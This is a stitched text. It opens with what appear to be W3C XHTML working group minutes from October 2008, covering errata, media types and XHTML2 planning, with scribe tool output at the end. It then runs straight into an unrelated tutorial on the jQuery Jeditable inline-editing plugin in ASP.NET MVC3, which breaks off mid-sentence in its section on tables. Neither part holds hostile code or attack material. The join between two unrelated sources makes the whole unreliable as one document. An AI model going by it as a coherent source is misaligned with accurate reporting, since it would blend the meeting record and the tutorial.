agenda that everytime something new on html-editor, i put on agenda, so i think only need to do a year's trawling/trolling SM: never added anything to an errata docmument ever ... troll agenda to find issues identified; just need to ensure resulted in decision ... according to melinda 2 typos which i fixed ... print went to rec in September 2006 SP: comment on fieldset sub-elements; Shane and Melinda replied ... fieldset asked and disposed - no other comments on Print RM: looking for mentions of XHTML 1.1 in html-editor ... flattened DTD ... talking about second edition flattened DTD so that's ok ... most recent one - replied SM: if any stuff need to update, should do it; technically, if stuff in errata doc, should be reflected, but errata docs empty ... all indications are that there aren't any dangling erratas <Steven> Mayakura? SP: isn't myakura our Basic rep -- he is here now, so let's ask him <Steven> Myakura? s/mayakura/myakura <myakura> yes? <ShaneM> are you aware of any errata or comments against XHTML Basic 1.1 as of yet? <myakura> ShaneM: not really. RM: need to work through these items - when to submit SP: shouldn't be too much process work <myakura> doesn't think i'm the rep for Basic though... SM: want to verify schema implementation works (by someone other than me) RM: worth talking with validator guys SM: if had schema validation, would be myakura just told me he is unaware of any errors <ShaneM> XML Events 2 updated at <Steven> <ShaneM> myakura: oh - sorry. Someone indicated you might know about it. We will ping Yam. Thanks! <myakura> no probs :) SM: not obvious how to use XSV SP: bad user interface SM: was able to use to validate schema along with oxygen and other tools ... reasonably confident, but until use schema in anger, won't know if work SP: could provide interface -- validate your doc against any of these schemas - XHTML validator SM: not a bad idea ... need to resolve to move to PER as soon as possible RESOLUTION: take Basic 1.1, Print 1.1, XHTML 1.1 to PER as soon as errata check finished SP: will email RDFa task force about monvement on that front <ShaneM> updated draft with schema of RDFa Syntax is at ADJOURN FOR LUNCH: RETURN IN 60 MINUTES [fyi] Using ARIA Live Regions to Make Twitter Tweet: aloha, alessio -- i have a question for you (and possibly diego and roberto) about iframe - i haven't finished the emessage yet, but i think i did point you to problem is, there aren't any com ports anymore for hardware TTS, and the newer screen readers don't support hardware TTS, which is why i'm trying to work with the RNIB on a sourceforge project for hardware speech support for stuff like NVDA <ShaneM> in your copious free time? something like that -- it's just that if NVDA wants to get ANY market penetration into the mainstream it HAS to support older tech, as hardware synths were VERY expensive i'm looking for other to do the coding - i'm just simon legree trying to harvest graduate students which is always a dangerous thing <ShaneM> can be rewarding but yeah - takes a lot off effort you said it -- that's why even the "mainstream" ATs are moving towards software everything but 70% of the target population is unemployed statistics that are similar throughout the "developed" world <ShaneM> thats a shockingly high number. sometime you will have to explain to me how that 70% eats which is why i've been trying to get WAI to set up proxy servers for 12 years -- see if the concept/fix works and if it does, implement it, but leave the proxy up ther for those whose hardware is "frozen in time" food stamps <Roland_> I do not, but my "vanilla" dog didn't really like stamps <Roland_> 06postma01n those are the numbers according to AFB (in USA) RNIB (in UK) and australia & NZ that's one postman who won't ring twice <ShaneM> are we getting ready to restart? to see what most blind people are dealing with, check 1 hour, 10 minutes & 56 seconds according to my stopwatch since we broke i have a stopwatch on my talking watch <ShaneM> zakim left us steven dismissed him <Steven> Di not <Steven> did not they have to connect first oh, then maybe it was roland RESOLUTION: take handler out, put into Events Module, ability to invoke script function will be added to handler ... specify either a handler or a function attribute; if specify both @function takes precedence ... keep everything from XHTML 1.1 definition of script RM: Shane had dialog with commentor We recommend that XHTML be delivered as HTML, but that means it is not valid HTML. Do we care? (above from agenda) SM: high level: applied most of simon's edits; not much from others; ... asked for clarification on few issues and he did that ... in this document - original Note and updating - original Note did thurough job of looking at all media types might deliver XML/XHTML document ... does it make sense to talk about DTDs and discourage their use ... Section 3.3 - application/xml SP: reads document ... worth pointing out that can do it, but may not always be processed as XHTML RM: while may work, recommend you don't do this ... shouldn't we recommend one over other SP: allow both, not champion one over other - ok to serve HTML to XML processor RM: application/xml and application+xml that have to say diff things about them ... what it is that we recommend should or should not do them ... you MAY or you SHOULD? ... who is meant to read document? SM: document authors RM: shouldn't we then be more explicit about XHTML family and modularization? SM: don't know how to answer that question RM: less technically correct - this applies to XHTML 1.0, XHTML 1.1 or XHTML Basic 1.1 SM: doesn't just apply to those RM: XHTML 1.1 Basic adoption by author application of XHTML Modularization ... can we put it that way -- if it begins with X, then it is XHTML and an author application of modularizatino SM: if this doc talks about M12n anywhere is a mistake ... mentions rec RM: reads from abstract ... is that really the case? ... that's why there are XHTML Media Types - only read this doc if want to write XHTML and how to best get processed by User Agent SM: ok RM: this is Note produced by us ... Introduction ... talks about XHTML1 versus HTML 4.01 SM: historical data RM: Introduction: brief summary RM: some stuff we don't want - they chose language, so will get what they get - language designer, not m12n that made that decision ... too much for people to say "do i have to worry about all this? i'll just use HTML 4.01" SM: ok - strike first paragraph? RM: actually last paragraph w SM: happy to reword, but last paragraph addresses objection tina had (we really should tell people use HTML4 unless need XHTML) - reasonable - don't jump through hoops if don't have to RM: terms and definitions XHTML Family Document Type: "A document type which belongs to the family of XHTML document types. Such document types, RM: support XHTML, but "host language document type" matter to reader of doc? SM: defined because term is used in previous definition - you are right - more academic approach than needed RM: Section 3.2 SM: only docs that adhere to our structural reqs can use this media type <alessio> agree with roland RM: that's why concentrating on reading from author's PoV ... same with application type - obscure terms versus critical terms ... if i am a document author, don't need to understand a lot of what is explained GJR: agree -- type of thing that makes people say "it's all geek to me" <alessio> yeah, that's true gregory RM: just tell me what to do, save theory for another document SM: originally not intended for document authors as it was to explain to XHTML2 what works and what doesn't in real world RM: significance check of terms - integration document set; host language document type SM: in previous term define XHTML family; would define XHTML Family by turning def around Section 3: 3. Recommended Media Type Usage RM: looks clear to me @@@@Issue: Do we believe that XHTML documents that adhere to the guidelines are "valid" HTML? Should that be a goal?@@@@ SM: Simon objects to this; i may be being obtuse SP: what is objection SM: thinks we are defining content-negotiation and are doing it ppoorly ... shouldn't be redefining rules of content negotiations in doc ... hadn't considered that problem; thinking had been if UA prefers text/html, give in xhtml because that is what it is RM: if accept header that states application/xhtml+xml ... <ShaneM> if the Accept header explicitly contains <code>application/xhtml+xml</code> <ShaneM> and prefers it over other types <ShaneM> deliver the document using that media type. <Steven> then deliver as xhtml because that is what it is SP: what is our aim? deliver XHTML - so deliver as xhtml, and problem over SM: exactly SP: trying to say if doesn't accept xhtml, have to do something else SM: if that is case - what WG wants to say - not defining content negotiation, but telling author if explicitly containx xhtml (with no Qvalue) deliver using that media type ... point 2: if explicitly contains xhtml ... (missed) ... point 3: if */*, then deliver what can RM: if text/html and xhtml, regardless of priorities, serve xhtml ... if can handle xhtml, always parse the xhtml SM: anything beyond point 4 is gilding the lilly RM: doesn't recommend xhtml text/html or */* - have to know what media types DOM is capable of - no recommendation GJR: makes sense, can only tell authors what to do, can't control parsing SP: want to say right up front that not redefining content negotiation RM: yes, need to make very clear <ShaneM> This section summarizes which Internet media type should <ShaneM> be used for which XHTML Family document for which purpose. <ShaneM> Note that while some suggestions are made in this section with <ShaneM> regard to content delivery, this section is by no means <ShaneM> a comprehensive discussion of content negotiation techniques. plus 1 to general gist RM: state intended readership up front? SM: yes, definitely <ShaneM> abstract: Many people want to use XHTML to author their web pages, but are confused <ShaneM> about the best ways to deliver those pages in such a way that they will be <ShaneM> processed correctly by various user agents. This Note contains <ShaneM> suggestions <ShaneM> about how to format XHTML to ensure it is maximally portable, and how to deliver <ShaneM> XHTML to various user agents - even those that do not yet support XHTML natively. <ShaneM> This document is intended to be used by document authors who want to use <ShaneM> XHTML today, but want to be confident that their XHTML content is going to <ShaneM> work in the greatest number of environments. <alessio> it has "pratical" sense... <Steven> Looks good to me <alessio> yes, me too SM: Section 3 - what to do when XML doc does not adhere to guidelines ... if doesn't adhere, don't send as text/html - needs transformation, not false declaration ... Simon pointed out should deliver html documents because not valid SP: should be saying "getting XHTML into browser" RM: if you do these things, it will be sufficient to get effect you want in most UAs SM: Steven, strike entire paragraph? RM: maybe should say nothing SM: it is about document performance, not UA limitatinos RM: use at own risk - will evolve -- suggestions to improve chances SM: up to us to keep document up to date - fix, and update periodically ... strike entire paragraph? <ShaneM> Steve suggested: When an XHTML document does NOT adhere to the guidelines, it should only be delivered as media type <code>application/xhtml+xml</code>. RM: strike it and see SM: added at specific request RM: pragmatic, not purist, document SM: removed all RFC2119 words ... remove about transforming into HTML? ... haven't removed any guidelines, but rules in 1.0 still in document - backwards compatibility there GJR: right SM: Simon said "why still asserting this - no longer relevant" - no longer relevant to opera 9, but where does that get the world? "q" parameter of the media type could help a server determine which of several versions of a document to deliver - thereby allowing server-side customization of content for specific cla SP: XHTML Basic gets delivered with profile ... OMA spec includes something along those lines RM: what would make me do something different in raction to note? SM: none - remove RM: should be as short as we can make it and no shorter SM: section 3.2 should be 3.1 RM: seemed out of order to me ... when conforms to guidelines in this document "carefully constrcuted" means what? SM: will fix ... character encoding RM: trying to figure out how to express why matters to me as author SM: don't need to give all background; just tell them what to do ... doesn't tell what to do anyway ... GL9 in Appendixl: Simon said example silly (change to japanese at end) RM: beware of character encoding issues, in particular GL/A.9 ... why reiterate? ... if have guidelines, point to them, don't reiterate them SM: if content in here i care about, will push down to guidelines ... 3.3. 'application/xml' RM: all is honky-dory - procede - no problem ... run through validator; if valid, procede ... bit of overkill SM: put in because validator people trying to enforce validity guidelines s/SM: 3.3 'application/xml'/SM: 3.2 application/xhtml+xml SM: XML stylesheet processing instructions? keep? SP: idea that this is XML so should use XML features where possible; when XML and HTML feaature, XML feature should get priority SM: not XSLT, but sytlesheet PI ... will just remove paragraph ... final paragraph - character encoding issues RM: thought was all utf-8 SM: if serving as text/html can serve as whatever you want RM: recommendations? HTML4 as well as XHTML SM: if that is the case shouldn't be telling people to ignore guidelines ... if message is you care about portability, follow the guidelines RM: content-encoding ... circular reference SM: doesn't depend on RFC ... documented in 3.3 - says same thing we already believe it wants ... will be document processing agents, not user agents - search engines, and trawling tools RM: 3rd paragraph - "generic user agent" ... user agent give what it asks for, don't worry about it SM: suggest leave 3.3 and 3.4 - remove references to other media types from this document RM: reference 3.3 to 3.2 SM: think can remove summary section RM: refer to it early on ... looks too complicated ... althought will be a lot smaller SM: we've said what preference rules are and why should use; at beginning of section 3, should expand on it - already did ... in section on application/xhml+xml - if document uses other namespaces MUST use this mime type RM: reverse and put in other section ... Appendix A looks better with DO NOTs and DOs ... Appendix A ... Appendix A.1 - sounds good SM: made all changes SimonP wanted, so should be satisfied - when done with whinnowing process, we should go back and add more examples RM: A.2, A.3 fine to me SM: added extras to A.4 RM: A.4 actually works? SM: yes RM: will be using SM: A.5 because is allowed ... A.6 missing - deleted rule - reluctant to renumber other rules because map to XHTML 1.0 SP: could say A.6 Deleted RM: or superseded by events GJR: thanks for A.7 SM: need to complete second "DO NOT" RM: should not use one or the other SM: rationale says why ... reinforces why need to reintroduce into XHTML2 ... A.8 Fragment Identifiers SP: very good GJR: 2 thumbs up (guess where) SM: meta stuff addressed in: covered here ... changed EUC-JP to utf-8 RM: Move on to Appendix A.10 SM: not sure got this right ... can rely on html DOM methods; overlap with XHTML DOM; but XHTML DOM not going to return elements and attributes in upper case ... think portable is: rely upon the DOM SP: all need to say SM: bit about element and attribute names meaningful - uppercase versus lowercase RM: if want to be case insensitive, use lower, otherwise will have to use camelcase ... be sensitive to case SM: DO ensure element and attribute names are case insensitive in your scripts. RM: A.12 seems fine ... just needs examples <alessio> yes RM: A.14 - ok ... A.15 formfeed character SP: fixed in later XML RM: no harm in doing this ... A.16 - ok ... A.17 The XML DTD Internal Subset SM: A.18 perhaps too strong "DO NOT use the XML CDATA mechanism." SM: contradict with A.4 - bring into harmony RM: A.19 - just tbody? SM: thought were ignored, not inferred? ... don't think are in DOM ... Steven, might be right that there is another inferred element SP: context of stylesheets, think just tbody RM: DO use the base element if you need to establish an alternate base URI for your document. should be in same block as ""DO NOT use the xml:base element. ... document.write - do not use SM: wondering if rationale is right SP: parsing models for XML doesn't require halving on fly; document.write only works with streaming parsers, so shouldn't use it; might do reader some good explaining how to do so modifies DOM directly SM: a "do" clause? RM: if this is what you ar etrying to achieve, use DOM manipulation to achieve same effect ... 22 application/xml and the DOM SM: get rid of it? SP: yes, SM: 23 put in over tina's objection "updating document using innerHTML" SP: is this difference between HTML and XHTML rule SM: simon said ensure content is well formed and here is GL if going to RM: reasonable caveat SM: took one step further RM: example, such as that needed for document.write - show how to do properly if need to do it ... 24 scripts and missing tbody elemtns SP: still don't understand why 23 in here? SM: have to ensure that conforms to GL if going to insert it SP: link should be in rationale ... 25 says too much and too little "Rationale: In HTML 4, these properties were often specified on the body element. CSS specifies that in XHTML they need to be specified on the html element in order to apply to the entire viewport." SM: and CSS spec says works that way SP: insisted spec say that because couldn't do any other way - compromise ... ensure any CSS properties on HTML element are also specified on BODY element ... warning is: if serve XHTML as xhtml, garuntee that CSS will work - if serve as html will work in some browsers and not in others SM: diff problem - CSS on body element, syles bounding box of body, not viewport ... very different effects SP: standard thing to do is switch everything off HTML and onto BODY ... On some user agents, put initial sytling on HTML some on BODY, so have to code CSS to take that to into account SM: ensure properties on HTML also on BODY is fine SP: rationale is some UAs recognize in BODY or HTML SM: 26 - didn't realize problem with noscript ... if scripting is enabled, contents of noscript parsed as CCDATA if script parsed as CDATA SM: 27 iframe Element SP: noscript needed because of document.write SM: thought no script was for alternative to script SP: if do all with DOM mutations, initial version of document can contain script that deletes the element ... functionality is there if use script - if use document.write version to change then do need noscript to catch that SM: 37 iframe Element SP: need explanation SM: simon says content is parsed differently - in HTML parsed as CDATA when scripting enabled, or PCDATA when scripting disabled, but in XML alwasy parsed as CDATA - same problem as noscript ... don't know if compatibility issue SP: not only if evaluated as HTML or XHTML but whether scripting enabled or not SM: need to copy bit from noscript one 1. What is the current state of accessibility of IFRAME? 2. What are the outstanding accessibility problems inherit to IFRAME, or have they been mitigated? HTML5) with OpenAjax's support for iFrames? RM: good if have demonstrative positive example will benefit intended reader base <alessio> we could investigate possible interactions between IFRAME and wai-aria SP: ODF wants to use RDFa in documents, and wanted to use xml:broccoli - allowed according to namespacing rules @alessio -- yes, definitely SM: RDFa - does it define an attribute collection? ... Metadata Attribute Collection <ShaneM> SP: CC message to group or just to ODF inquirer? <Steven> I just messaged the guy <Steven> since he sent it to me only SP: all our ducks are in a row SM: at last f2f we agreed that i was to rip out all sections duplicating content of other specs, then refer to them and then be done ... then thought bad idead beacuse refer to attributes that aren't defined in spec ... have to include placeholders in spec ... told me to rip that all out SP: if go to Forms section, tells me what i need to know SM: thought i was supposed to take that out RM: pointer saying there is this module and the module is elsewhere; summary in XHTML2 or statement "here is module, here is pointer" SM: like that tact <ShaneM> XHTMLMIME is updated RM: a module such as XML Events and XML Handlers are for incorporation into 1.3 if wanted and XHTML2 if wanted -- is that true? ... like to think it is true, but may never be true statement depending on what happens with XHTML2 ... developing XML Events 2 reusable in both existing m12n scheme and XHTML2 SP: yes, for both, XForms is planning on importing events 2 RM: nothing more in XHTML2 than incorporates XML Events 2 and XHML Handlers 2 ... Access, Role, etc. only in XHTML2 by reference SM: ok ... dependent on modules - long pole in tent Access or Events 2 RM: implementations for XHTML2 will be needed, too ... Script module in there, too - pull that into XHTML2 and add @implements SP: issue new WD next month? RM: before christmas moritorium SP: relationship to referenced documents RM: in LC SP: early next year for LC would be good target SP: when RM: february ok SP: pretty far advanced - things don't have implementations for in XHTML2 (frames replacement stuff) and @src and @href everywhere; alessio helping on all those fronts ... implementation of features demonstration in good shape SM: what version of XForms including? SP: anticipating XForms 1.1 SM: XML Events 2, too? SP: yes SM: can't imagine get too far without test suite <alessio> surely gregory SP: once go to LC, major work will be producing test suite SM: had one of my guys take existing XHTML test suite and start readying for change to XHTML2 - should i have him continue? SP: yes SM: if can take advantage of that work will help us along SP: anything else? RM: talked about docs individually - resolved to go to CR and PER on docs; ... XHTML2 separate into separate specs at later date? MOVE TO ADJOURN RM: bangs gavel - MEETING ADJOURNED SM: meet next wednesday? SP: call starts while still at airport GJR: US Daylight savings time ends this weekend SM: if have any cycles to work on transition requests for PERs i probably have the time SP: long ago, we said to anne van kestren that we would change IDREF on imagemaps when re-issued 1.1 ... should make sure we should do that SM: where 1.2 or 2? RM: 1.2 SM: override def of module for m12n - not update m12n because then break all other languages <ShaneM> ACTION: Shane add the IDREF change for imagemap to XHTML 1.2 [recorded in] <trackbot> Created ACTION-16 - Add the IDREF change for imagemap to XHTML 1.2 [on Shane McCarron - due 2008-10-31]. ADJOURNED <Steven> thanks ALessio pressent- oedipus This is scribe.perl Revision: 1.133 of Date: 2008/01/18 18:48:51 Check for newer version at Guessing input format: RRSAgent_Text_Format (score 1.00) Succeeded: s/wen/went/ Succeeded: i/Date: 24 October 2008/scribenick: oeddie Succeeded: i/SM: added @eventtarget/ScribeNick: oedipus_laptop Succeeded: i/SM: issue remaining/ScribeNick: oedipus Succeeded: s/""/"/ FAILED: s/relae/replace/ Succeeded: s/if/id/ Succeeded: s/invoke a script/invoke a script function/ Succeeded: s/Shiva/Chiba/ FAILED: i/Attendees/Previous: FAILED: i/see also/Previous: Succeeded: s/"whatever()"/"whatever"/ Succeeded: s/tried/Bjoern Hoermann/ Succeeded: s/mann/mann tried/ Succeeded: s/Hoer/Hoehr/ Succeeded: s/SP/RM/ Succeeded: s/@/#/ Succeeded: s/Regrets+ alessio// FAILED: s/of nothing/no problem/ Succeeded: s/id/@id/ Succeeded: s/source/src attribute/ Succeeded: s/implement/implements/ Succeeded: s/remove @defer from script element/keep everything from HTML 4.01 definition of script/ Succeeded: s/keep everything from HTML 4.01 definition of script/keep everything from XHTML 1.0 definition of script/ Succeeded: i/RM: topic haven't addressed/Topic: Fallout of M12N 1.1 Succeeded: i/RM: topic haven't/TOPIC: Fallout of M12n Succeeded: s/may/my/ FAILED: s/mayakura/myakura/ Succeeded: s/would e/would be/ Succeeded: s/1.0/1.1/ Succeeded: s/TOPIC: M12n/TOPIC: XHTML Mime/ Succeeded: s/n't// Succeeded: s/n't// Succeeded: s/paragraph/paragraph?/ Succeeded: s/3.4/3.2/ Succeeded: s/trhough/through/ WARNING: Bad s/// command: s/SM: 3.3 'application/xml'/SM: 3.2 application/xhtml+xml Succeeded: s/utf-i/utf-8/ Succeeded: s/B/A.10/ Succeeded: s/37 iframe/27 iframe/ Succeeded: s/planning/XForms is planning/ Found ScribeNick: oeddie Found ScribeNick: oedipus_laptop Found ScribeNick: oedipus Inferring Scribes: oeddie, oedipus_laptop, oedipus Scribes: oeddie, oedipus_laptop, oedipus ScribeNicks: oeddie, oedipus_laptop, oedipus Default Present: ShaneM, Executive_3, oedipus Present: Alessio Charlie Executive_3 Gregory Nick Raman Roland Shane ShaneM Steven Uli oedipus Masataka_Yakura(remote) Gregory_Rosmaita Regrets: MarkB Tina Agenda: Found Date: 24 Oct 2008 Guessing minutes URL: People with action items: shane WARNING: Input appears to use implicit continuation lines. You may need the "-implicitContinuations" option.[End of scribe.perl diagnostic output]
http://www.w3.org/2008/10/24-xhtml-minutes.html
CC-MAIN-2016-44
refinedweb
8,256
58.82
Code. Collaborate. Organize. No Limits. Try it Today. You have probably seen a new HTML5 feature called contenteditable. It enables you to edit any element in HTML using the inline editor. The only thing you will need to do is attach some event handlers that will be called when editing is finished and send the new content to the server-side. If you like this HTML5 feature, you will love this plug-in. Although the contenteditable feature is nice to have, if you have tried to use it in your web applications, you have probably noticed that you need to implement a lot of other functionalities such as sending AJAX requests to the server side, handling errors, validation, etc. Also, it works great if you edit plain text, however if you want to use some other editor such as calendar, check box, or select list where you don't want to enable the user to enter anything, you will see that regular contenteditable is not sufficient enough. In this article, I will show you a jQuery alternative for content editable - the Jeditable plug-in. Also, here I will explain how you can implement inline editing functionality in an ASP.NET MVC3 application using jQuery. The Jeditable plug-in enables you to create an click and edit field as shown in the following figure: On the left side is shown a simple HTML page, and on the right side is shown this page when you click on the text. The text will be replaced with a text area, and two buttons for save and cancel will be generated. When you finish with editing and click the OK button, text in the text area will be posted to the server page and new text will be placed instead of the old one. You can see this in the live examples on the Jeditable demo site. The Jeditable plug-in can be easily customized (e.g., to use text input or select a list instead of a text area, change style/behavior, etc.) as explained in the rest of the article. On the demo page with custom examples see various examples with different editor types. Also, it will handle for you communication with the server side page. The Jeditable plugin is a very useful plugin that enables inline editing of HTML. With the Jeditable plugin, you can enable users of your application to simply click on the element they want to change and modify it immediately without a separate edit form. The idea behind the Jeditable plugin is to replace static elements with the appropriate form element where the user can edit content and submit it to the server-side. As an example, let us assume that you have placed some static HTML element in the page - something like the following HTML code: <span id="txtUser">John Doe</span> This is a plain text field. You can enable the user to click on this field and edit it using the following JavaScript call: $("#txtUser").editable("/ServerSide/Update"); Each time the user clicks on the element with the ID txtUser, the Jeditable plugin will convert this element to a text box, put the content of the element in the text box value, and post a new value to the /ServerSide/Update URL via an AJAX call when the user presses Enter. If the value is successfully saved on the server-side page, the Jeditable plugin will replace the old value of the element with the new one. txtUser The Jeditable plugin will handle all interactions on the user interface, and the only thing you will need to do is configure the plugin and implement server-side logic that handles the changed values. In this article I will explain how to use the Jeditable plugin in an ASP.NET MVC3 application. In the following sections are described details about the model, view, and controller that will be used in the example. In this example is used a simple model representing a company. The source code for the model class is shown in the following listing: public class Company { public int ID { get; set; } public string Name { get; set; } public string Address { get; set; } public string Town { get; set; } } View is a standard Razor page where is displayed details about the company. @model JQueryMVCEditable.Models.Company @{ Layout = "~/Views/Shared/_Layout.cshtml"; } <h2>Details</h2> <fieldset> <legend>Company</legend> <input type="hidden" id="CompanyId" value="@Model.ID" /> <div class="field"> <div class="display-label" id="lblName">Name</div> <div class="display-field text" id="Name">@Model.Name</div> </div> <div class="field"> <div class="display-label" id="lblAddress">Address</div> <div class="display-field textarea" id="Address">@Model.Address</div> </div> <div class="field"> <div class="display-label" id="lblTown">Town</div> <div class="display-field select" id="Country">@Model.Town</div> </div> </fieldset> The basic function of the controller is to get the company object (model) and provide it to the view. The code for showing details about the company is shown in the following listing: public class CompanyController : Controller { public string Details(){ ... } } In order to show company details, you will need to enter the URL /Company/Details. There are two other methods in the controller that accept AJAX calls from the Jeditable plug-in (this will be described below). Once you run this code, you will get the standard details page as shown on the following figure: You might notice that this is a standard, unstyled MVC details page generated by Visual Studio. It contains a fieldset with the label "Company", where I have placed three company fields (company, name, address, and town) with labels. In the next section I will show you how you can convert this static view into fully editable elements. In this section, I will show you how you can implement fully inline editable functionality in the details page. In the first example, we will make the labels editable so the user can change them directly on the page. In the page, each input field has its own label such as: <div class="display-label" id="lblName">Name</div> In the page I have placed a display-label class in each div that represents a label. I will use this class to make the label editable. jQuery code that applies the Jeditable plugin on the labels is shown in the following listing: div $(".display-label").editable("/Company/UpdateLabel"); Each time you click on the label, it will be converted to text input where the user can enter a new value for the label. This is shown on the following figure: As you can see, clicking on the label "Name", it is converted into text input. When the user presses the Enter key, a value of the new label will be sent to the /Company/UpdateLabel server side page. In the request will be sent two values: id value An example of such a kind of request is shown on the following figure: On the server side should be added a controller with the action method that will be called when the /Company/UpdateLabel request is sent. An example of the controller and action method is shown in the following listing: public class CompanyController : Controller { public string UpdateLabel(string id, string value) { return value; } } This action method accepts the ID of the label and a new value. Specific code for updating the label value in the database or configuration files is omitted because it is application specific and not directly related to the plug-in. We can also make the field values editable. Let us assume that we have placed the ID of the current company in the hidden field with the ID CompanyId, and that each field value is placed in the div with class display-field. Part of the HTML is shown in the following code: CompanyId display-field <input type="hidden" id="CompanyId" value="@Model.ID" /> ... <div class="display-field text" id="Name">@Model.Name</div> ... <div class="display-field text" id="Address">@Model.Address</div> ... <div class="display-field text" id="Town">@Model.Town</div> We will assume that each field that should be editable has a class "display-field". jQuery code that applies the Jeditable plugin on the editable fields is shown in the following listing: $(".display-field").editable("/Company/UpdateField", { submitdata : { CompanyId: function() { return $("#CompanyId").val(); }, RecordType: "COMPANY" } }); Each time you click on the element with the class editable, it will be converted to text input as shown on the following figure: editable When the user presses Enter, a new value of the element will be sent to the server side page /Company/UpdateField. In the request will be sent four values: value RecordType As you can see, the code is very similar to the previous code, with a difference in the two additional parameters CompanyId and RecordType. As we are editing particular companies and not global labels, we should have on the server side the ID of the company where we are changing the field value. I have placed the ID of the company in the hidden field with ID 'CompanyId' and the Jeditable plug-in takes this value and adds it to the request parameters when requests are submitted. CompanyId Also, sometimes we would need to know on the server side if we are editing companies, jobs, people, products, etc. Therefore, it would be nice to have some additional parameters that send information about what the type of the record is that we are editing. In this example, this is achieved using the second custom submitdata parameter called RecordType. The server-side page will check the value of this parameter and update either company, job, product, etc. In this simplest example, we have only companies so this parameter is not used. As an alternative, you can use different URLs for different record types (e.g., '/Company/UpdateField', 'Product/UpdateField', 'Job/UpdateField', etc.) if you do not want to have an additional parameter. A trace of the AJAX call that is sent to the server-side is shown on the following figure: submitdata On the server side should be added a controller with the action method that will be called when the /Company/UpdateField request is sent. An example of the controller and action method is shown in the following listing: public class CompanyController : Controller { public string UpdateField(string id, string value, int CompanyId, string RecordType) { return value; } } This action method accepts the ID of the field, the new value, the ID of the company, and the type of the record we are editing. Specific code for updating the company field value in the database is omitted because it is application specific and not directly related to the plugin. The default functionality can be easily changed by setting different options in the plugin initialization call. Options are set as a second parameter in the Jeditable call. In this section will be shown different options that can be applied. By default, clicking on the element will initiate the Jeditable plugin and pressing the Enter key will be considered as accepting changes. Losing focus from the element (blur) or pressing the ESC key will be considered as cancel action. You can change these options and add separate buttons for the accepting and canceling actions, which will be injected beside the text input. In order to configure the submit and cancel buttons, you will need to set these parameters in the initialization: $(".editable-field").editable("/Company/UpdateField", { cancel : 'Cancel', submit : 'OK' }); If cancel and submit parameters are not set, the buttons will not be generated. The text box is a default editor, however you can use a text area of a select list as an alternative editor. In order to use a text area instead of text input, you should just change the value of the parameter type as shown in the following example: type $(".textarea").editable("/Company/UpdateField", { type : 'textarea', rows : 4, columns : 10, cancel : 'Cancel', submit : 'OK', }); Note that when you use the text area input, you should add a Submit button because in the textarea, an Enter key adds a new line so it cannot be used for submitting a value. Look of the editor configured as a text area is shown on the following figure: Another editor type is a select list where you can define a set of options that might be selected. An example is shown in the following listing: $(".select").editable("/Company/UpdateField", { type : 'select', data : "{'Belgrade':'Belgrade','Paris':'Paris', 'London':'London', 'selected':'Belgrade'}" }); In this example, the select list containing three values is generated. Note that the last parameter tells the Jeditable plugin which value should be selected. Instead of the hardcoded values in the data parameter, you can load options from the server-side URL: data $(".remote-select").editable("/Company/UpdateField", { type : 'select', loadurl : '/Company/Options', loadtype : 'GET', loaddata : {type: "1"}; }); When the user clicks on the element, a /Company/Options?type=1 request will be sent to to server-side using the GET protocol. The returned values will be used as options in the select list. A select list editor is shown on the following figure: Text box, text area, and select list are standard editors, but there are other custom types such as checkbox, datepicker, file upload, time editor, etc. Some of them are shown on the Jeditable demo page. If you cannot find an editor type you need, you can create your own editor - see this tutorial for more details. By default, the Jeditable plug-in sends the ID of the element and value that is entered in the input element to the server-side URL. However, you can customize these settings as shown in the following example: $("#txtTitle").editable("/Company/UpdateField", { id : 'COMPANY_FIELD', name : 'FIELD_VALUE', method: 'POST', submitdata : {type: "company"} }); Additional options are: name method When Jeditable submits a request to the server-side, the POST request will look like: /Company/UpdateField?COMPANY_FIELD=Name&FIELD_VALUE=TEST&type=company. As you can see, the id and value parameters have different names, value is encoded, and a new parameter called type is added to the request. type The way the editable plugin is activated can be set in the configuration. This is configured using the event and onblur parameters: event onblur $("#txtTitle").editable("/Company/UpdateField", { event : 'click', onblur : 'submit' }); The parameter event is a jQuery event that will convert the content to editable input (e.g., 'click' , 'dblclick, or 'mouseover'). The onblur parameter can have one of these values: 'cancel', 'submit', 'ignore', or can be set to a function. This parameter will define what the plugin does when input loses focus. event click dblclick mouseover You can change the way Jeditable is displayed. You can set the style or associate a CSS class with the form where the inline editor is placed. If you put the value 'inherit', a class or style from the surrounding element will be placed in the form. Also, you can define the width and height of the editor. An example is shown in the following listing: $("#txtTitle").editable("/Company/UpdateField", { cssclass : 'inherit', style : 'display:inline', height : '20px', width : '100px' }); In this configuration a CSS class will be inherited from the surrounding element, the form will be displayed inline, and dimensions of the textbox will be 20x100px. You can also define what text will be shown if a current one does not exist, what will be used as tooltip text, and what text/HTML will be shown while the server is saving the edited value: $("#txtTitle").editable("/Company/UpdateField", { placeholder : 'N/A', tooltip : 'Click to edit', indicator : 'Saving...', select : true data: function(value, settings) { return encode(value); }, }); In this example, if the element does not have any content 'N/A' will be displayed (default value is 'Click to edit'), tooltip will be 'Click to edit'. While the plugin waits the answer from the server, text 'Saving...' will be displayed. You can put HTML instead of the plain text if you want. Once user edit the text, it will be automatically highlighted because select property is set to true. Data parameter represents the data that will be shown in the editor. In the previous example with the select editor type, in the data element was placed list of options that will be placed in the select list. If you put a function as a data parameter, it will be called before Jeditable takes the current text from the element, this text will be passed to the function, and the returned value will be set as the content of the editor element. It can be either a string or function returning a string. This can be useful when you need to alter the text before editing (e.g., encode it as shown in the example). Data Many events can be handled in the Jeditable plug-in: callback settings this onsubmit original onreset onerror The beauty of the Jeditable plugin is the fact that it can be applied on top of any other plugin. As an example you can apply inline cell editing in table cells, edit nodes in the tree view or in the menu, edit content of tabs, etc. The only thing you need to do is apply the Jeditable plugin on the elements that should be edited. In the following examples you might find tow usages of editable plugin with tabs and tables. JQuery UI tabs is a part of JQuery UI library and it enables you to easily create tabbed interface. You can find a various cases o usage on the JQuery UI Tabs page. Example of tabbed interface is shown in the following figure: Each tab in the picture is a link in the format <a href="#tab-1">Nunc tincidunt</a>, <a href="#tab-2">Proin dolor</a>, <a href="#tab-3">Aenean lacinia</a>, where tab-1, tab-2, and tab-3 are ids of tab contents. You can apply editable plugin on the tab links using the following code: <a href="#tab-1">Nunc tincidunt</a> <a href="#tab-2">Proin dolor</a> <a href="#tab-3">Aenean lacinia</a> $("#tabs").tabs(); $("a[href='#tabs-1']").editable("/Settings/UpdateTabLabel", { event: "dblclick", submitdata: { id: "tab-1" } }); /Settings/UpdateTabLabel Similar script can be applied to make the other tabs editable. JQuery DataTabes plugin adds pagination, filtering and sorting in the table. Once you apply DataTables plugin you can 